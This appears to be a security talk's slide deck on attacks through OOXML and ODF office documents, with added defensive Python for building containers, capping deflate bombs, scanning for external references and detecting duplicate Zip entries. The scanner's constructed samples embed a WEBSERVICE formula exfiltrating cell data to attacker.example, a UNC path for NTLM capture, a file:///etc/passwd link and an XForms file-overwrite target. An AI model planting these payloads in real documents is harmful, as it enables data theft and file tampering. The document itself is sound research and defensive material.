Office Document Security and Privacy
Jens Müller, Fabian Ising, Christian Mainka, Vladislav Mladenov, Sebastian Schinzel, Jörg Schwenk
1 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
2 History: Office Wars
• 1990: MS Office 1.0
• 2002: StarOffice → OpenOffice.org
• 2006: OOXML (ECMA-376) + ODF (ISO/IEC 26300) standardization; OOXML became ISO/IEC 29500 in 2008
• 2010: OpenOffice.org → LibreOffice
3 Two competing standards
OOXML (ISO/IEC 29500)            | ODF (ISO/IEC 26300)
Office Open XML                  | OpenDocument Format
~6500 pages                      | ~800 pages
(some) MS proprietary formats    | re-use of SVG, MathML, XForms, …
.docx, .xlsx, .pptx, …           | .odt, .ods, .odp, …
XML-based, Zip container         | XML-based, Zip container
4 OOXML Directory Structure
5 OOXML Example
6 ODF Directory Structure
7 ODF Example
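Added example (not code from the slides or from the RUB-NDS artifacts): the two container layouts the directory-structure slides depict, built by hand with Python's zipfile. The part contents are minimal constructed samples; the namespace URIs and the ODF rule that `mimetype` is the first entry and stored uncompressed come from the two standards.

```python
"""Build minimal OOXML (.docx) and ODF (.odt) containers and tell them apart."""
import io
import zipfile

# Constructed, minimal part contents; the namespace URIs are the ones the standards define.
DOCX_PARTS = {
    "[Content_Types].xml":
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Override PartName="/word/document.xml" '
        'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>',
    "_rels/.rels":
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
        'Target="word/document.xml"/>'
        '</Relationships>',
    "word/document.xml":
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>Hello OOXML</w:t></w:r></w:p></w:body></w:document>',
}

ODT_MIMETYPE = "application/vnd.oasis.opendocument.text"
ODT_PARTS = {
    "META-INF/manifest.xml":
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<manifest:manifest xmlns:manifest="urn:oasis:names:tc:opendocument:xmlns:manifest:1.0" '
        'manifest:version="1.2">'
        f'<manifest:file-entry manifest:full-path="/" manifest:media-type="{ODT_MIMETYPE}"/>'
        '<manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>'
        '</manifest:manifest>',
    "content.xml":
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" office:version="1.2">'
        '<office:body><office:text><text:p>Hello ODF</text:p></office:text></office:body>'
        '</office:document-content>',
}


def build_docx() -> bytes:
    """OOXML is an OPC package: [Content_Types].xml and _rels/.rels are the entry points, entry order is free."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in DOCX_PARTS.items():
            zf.writestr(name, xml)
    return buf.getvalue()


def build_odt() -> bytes:
    """ODF requires 'mimetype' first and uncompressed, so the type is readable without inflating anything."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", ODT_MIMETYPE, compress_type=zipfile.ZIP_STORED)
        for name, xml in ODT_PARTS.items():
            zf.writestr(name, xml, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def list_parts(blob: bytes):
    """(name, compression method, uncompressed size) for every entry, in container order."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [(i.filename, i.compress_type, i.file_size) for i in zf.infolist()]


def sniff_format(blob: bytes) -> str:
    """Identify the container by the marker part each standard mandates."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()
        if names and names[0] == "mimetype":
            return zf.read("mimetype").decode()  # ODF: the MIME type itself
        if "[Content_Types].xml" in names:
            return "OOXML"
        return "unknown"


if __name__ == "__main__":
    for blob in (build_docx(), build_odt()):
        print(sniff_format(blob))
        for name, method, size in list_parts(blob):
            kind = "stored" if method == zipfile.ZIP_STORED else "deflated"
            print(f"  {name:24} {kind:9} {size} bytes")
```

Both outputs open in LibreOffice as empty-looking documents; everything the later slides abuse lives in additional XML parts and relationship files inside the same container.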
8 Attacker Model
• Victim opens malicious office document
• “Bad things” happen (attack-dependent)
9 Overview
1. OOXML/ODF Basics 2. Denial of Service (Deflate Bomb) 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
10 Deflate Bomb
• Deflate's maximum compression ratio is about 1:1032 (one length/distance pair of two bits can stand for 258 output bytes), so a part of a few MB inflates to several GB
• Both the Zip layer and the XML parser then work on the inflated data
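Added example (not code from the slides or the RUB-NDS artifacts): a one-part deflate bomb built with Python's zipfile, next to the two checks a document parser should run before inflating a part. The declared-ratio threshold and the output cap are assumed values.

```python
"""Deflate bomb: build one, then show the two checks that stop it before it fills memory."""
import io
import zipfile

MAX_RATIO = 100                      # declared uncompressed:compressed ratio we refuse (assumed limit)
MAX_PART_BYTES = 50 * 1024 * 1024    # hard cap on actually inflated output per part (assumed limit)


def build_zip(payload: bytes, name: str = "word/document.xml") -> bytes:
    """Constructed sample: a one-part container holding `payload`, compressed at level 9."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED, compresslevel=9) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def build_bomb(uncompressed_size: int = 8 * 1024 * 1024) -> bytes:
    """All-zero input approaches Deflate's ~1:1032 limit: 8 MiB shrinks to roughly 8 KiB."""
    return build_zip(b"\0" * uncompressed_size)


def declared_ratio(blob: bytes) -> float:
    """Largest ratio the central directory claims. Cheap, but those fields are attacker-controlled."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return max(i.file_size / max(i.compress_size, 1) for i in zf.infolist())


def safe_read_part(blob: bytes, name: str, max_ratio: float = MAX_RATIO,
                   cap: int = MAX_PART_BYTES) -> bytes:
    """Inflate `name`: refuse an implausible declared ratio up front, and abort as soon as the
    real output exceeds `cap`, the one check that does not depend on header fields."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        info = zf.getinfo(name)
        ratio = info.file_size / max(info.compress_size, 1)
        if ratio > max_ratio:
            raise ValueError(f"{name}: declared ratio {ratio:.0f}:1 exceeds {max_ratio}")
        chunks, total = [], 0
        with zf.open(info) as f:
            while True:
                chunk = f.read(64 * 1024)
                if not chunk:
                    break
                total += len(chunk)
                if total > cap:
                    raise ValueError(f"{name}: more than {cap} bytes after inflating, aborting")
                chunks.append(chunk)
        return b"".join(chunks)


def is_rejected(blob: bytes, name: str, **limits) -> bool:
    """True if safe_read_part refuses the part under the given limits."""
    try:
        safe_read_part(blob, name, **limits)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    bomb = build_bomb()
    print(f"bomb: {len(bomb)} bytes on disk, declared ratio {declared_ratio(bomb):.0f}:1")
    print("rejected by ratio check:", is_rejected(bomb, "word/document.xml"))
    print("rejected by output cap alone:", is_rejected(bomb, "word/document.xml", max_ratio=1e9, cap=1024))
```

Python's zipfile happens to stop at the declared size, so the streaming cap matters most for inflaters that trust the stream rather than the directory; keeping both checks costs nothing.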
11 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy (URL Invocation, Evitable Metadata) 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
12 URL Invocation
• Goal: “phone home” to attacker’s server once document is opened
13 URL Invocation
CVE-2020-12802 (LibreOffice: remote graphics linked from .docx files were fetched even with “stealth mode” enabled, the option meant to block remote resources for untrusted locations; fixed in 6.4.4)
14 URL Invocation
15 Evitable Metadata (image source: news.bbc.co.uk)
16 Evitable Metadata
17 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure (Data Exfiltration, File Disclosure, Credential Theft) 5. Data Manipulation 6. Code Execution 7. Evaluation
18 Data Exfiltration
• Idea: victim receives a spreadsheet; the values the user enters are sent to the attacker’s server
19 File Disclosure
• Idea: make the document pull local files from the victim’s disk into its own content
20 File Disclosure
21 File Disclosure
22 File Disclosure
23 Credential Theft
• Goal: obtain user’s NTLM hash
24 Credential Theft
• What the attacker’s server captures is the NTLM challenge-response (Net-NTLMv2), not the raw NT hash
• Offline cracking
  – NTLMv2: a modern GPU needs about 2.5 h for an eight-character password
  – NTLMv1, LM: considered broken [Marlinspike2012]
• Relay attacks (a captured response cannot be used for pass-the-hash)
  – Compare [Ochoa2008, Hummel2009]
  – Depending on Windows security policy (e.g., whether SMB signing is required)
25 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation (File Write Access, Content Masking) 6. Code Execution 7. Evaluation
26 File Write Access
• Idea: XForms allow local file as target
27 File Write Access
CVE-2020-12803 (LibreOffice: XForms submissions accepted file: URIs as targets, so a document could overwrite arbitrary local files; fixed in 6.4.4)
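Added example serving the URL Invocation, File Disclosure, Credential Theft and File Write Access slides above (not code from the slides or the RUB-NDS artifacts): a scanner over the XML parts of either container that flags every attribute pointing outside the document, i.e. remote URLs (phone home, exfiltration), UNC paths (NTLM challenge capture), and file: URIs used as link sources (disclosure) or XForms submission targets (write access). The sample documents, hosts and paths are constructed; the scheme list and the carriers used in the samples (an external image relationship, an attachedTemplate relationship, an ODF linked section, an xforms:submission, a spreadsheet formula) are assumptions about what such documents contain, not the specific payloads of the talk.

```python
"""Flag references that make an OOXML or ODF document reach outside itself."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Reference shapes worth flagging (assumed list, extend as needed): URL schemes and UNC paths.
REF_RE = re.compile(r"""(?:https?|ftps?|file|smb)://[^\s"'<>]+|\\\\[^\s"'<>\\]+\\[^\s"'<>]*""", re.I)


def classify(ref: str) -> str:
    r = ref.lower()
    if r.startswith("\\\\") or r.startswith("smb:"):
        return "unc"          # forces an SMB connection, hence an NTLM challenge-response
    if r.startswith("file:"):
        return "local-file"   # read (link source) or write (submission target) on the victim's disk
    return "remote"           # phone home / exfiltration


def scan_document(blob: bytes):
    """Return (part, element, attribute, kind, reference) for every suspicious attribute."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if not name.endswith((".xml", ".rels")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append((name, "?", "?", "unparseable", ""))
                continue
            for el in root.iter():
                tag = el.tag.rsplit("}", 1)[-1]                      # drop the namespace URI
                external_rel = tag == "Relationship" and el.get("TargetMode") == "External"
                for attr, val in el.attrib.items():
                    attr = attr.rsplit("}", 1)[-1]
                    if tag == "Relationship" and attr != "Target":
                        continue                                     # Id and Type are not references
                    m = REF_RE.search(val)
                    if m:
                        findings.append((name, tag, attr, classify(m.group(0)), m.group(0)))
                    elif external_rel and attr == "Target":
                        # OPC marks targets outside the package explicitly, even without a scheme
                        findings.append((name, tag, attr, "external-relationship", val))
    return findings


def pack(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for n, x in parts.items():
            zf.writestr(n, x)
    return buf.getvalue()


# Constructed samples: only the parts the scanner looks at, no real hosts.
OOXML_SAMPLE = pack({
    "word/_rels/document.xml.rels":
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        'Target="http://attacker.example/pixel.png" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
        'Target="\\\\attacker.example\\share\\t.dotx" TargetMode="External"/>'
        '</Relationships>',
})
ODF_SAMPLE = pack({
    "content.xml":
        '<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        'xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:xforms="http://www.w3.org/2002/xforms">'
        '<office:body><office:text>'
        '<office:forms><xforms:model><xforms:submission id="s1" method="put" '
        'action="file:///home/victim/overwritten.xml"/></xforms:model></office:forms>'
        '<text:section text:name="leak"><text:section-source xlink:href="file:///etc/passwd"/></text:section>'
        '<table:table><table:table-row><table:table-cell '
        'table:formula="of:=WEBSERVICE(&quot;http://attacker.example/?v=&quot;&amp;[.A1])"/>'
        '</table:table-row></table:table>'
        '</office:text></office:body></office:document-content>',
})

if __name__ == "__main__":
    for label, blob in (("OOXML", OOXML_SAMPLE), ("ODF", ODF_SAMPLE)):
        for part, tag, attr, kind, ref in scan_document(blob):
            print(f"{label}: {part} <{tag} {attr}> {kind}: {ref}")
```

The scanner is deliberately format-agnostic: it does not need to know which element carries the link, only that an attribute value names a host or a path, which is why it also catches the formula in the spreadsheet cell and the XForms target that the talk turns into a file write.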
28 Content Masking: OOXML
29 Content Masking: ODF
(Figure labels: “Parsed by MS Office” / “Parsed by LibreOffice”)
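Added example (not code from the slides or the RUB-NDS artifacts): the slides do not state which ambiguity they used, so this shows the classic Zip-level one, two entries with the same name. A reader that honours the first entry and one that honours the last produce different documents; the defensive move is to detect the ambiguity rather than trust either reading. The entry name and contents are constructed.

```python
"""Content masking via a Zip ambiguity: two entries share the name word/document.xml."""
import io
import warnings
import zipfile


def build_ambiguous(first: bytes, second: bytes, name: str = "word/document.xml") -> bytes:
    """Constructed sample: the same entry name written twice into one container."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")          # zipfile only warns about the duplicate name
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(name, first)
            zf.writestr(name, second)
    return buf.getvalue()


def read_first_wins(blob: bytes, name: str) -> bytes:
    """Walk the central directory in order and open the first matching record directly."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.filename == name:
                with zf.open(info) as f:
                    return f.read()
    raise KeyError(name)


def read_last_wins(blob: bytes, name: str) -> bytes:
    """zipfile.read(name) goes through a name->record map filled in directory order: the last entry wins."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.read(name)


def duplicate_entries(blob: bytes):
    """Names that occur more than once in the central directory."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()
    return sorted({n for n in names if names.count(n) > 1})


def is_masked(blob: bytes, name: str) -> bool:
    """True when the two plausible readings of `name` disagree, i.e. the content depends on the parser."""
    return read_first_wins(blob, name) != read_last_wins(blob, name)


if __name__ == "__main__":
    doc = build_ambiguous(b"<w:t>harmless text</w:t>", b"<w:t>hidden text</w:t>")
    print("duplicates:", duplicate_entries(doc))
    print("first-wins reader sees:", read_first_wins(doc, "word/document.xml"))
    print("last-wins reader sees: ", read_last_wins(doc, "word/document.xml"))
    print("masked:", is_masked(doc, "word/document.xml"))
```

The same two-readings comparison generalises to the other ambiguities the slides' countermeasures allude to: wherever two parsers may pick different parts (a content type override versus a default, a manifest entry versus the actual Zip entry), parse both ways and refuse the document if the results differ.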
30 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution (Macros) 7. Evaluation
31 Macros
32 Additional Findings
CVE-2018-8161 (memory corruption)
33 One-Click RCE in LibreOffice
• We can write XML to arbitrary files
• LibreOffice config file itself is XML
34 One-Click RCE in LibreOffice
CVE-2020-12803 (the same XForms local-file write, now aimed at LibreOffice’s own XML configuration)
35 Overview
1. OOXML/ODF Basics 2. Denial of Service 3. Invasion of Privacy 4. Information Disclosure 5. Data Manipulation 6. Code Execution 7. Evaluation
36 Evaluation
37 Countermeasures
• Removing insecure features
• User privacy by default
• Limitation of resources
• Elimination of ambiguities
38 Conclusion
• OOXML and ODF are complex formats
• Thorough analysis of dangerous features
• One-click pure logic chain RCE in 2020 ;)
Artifacts: https://github.com/RUB-NDS/Office-Security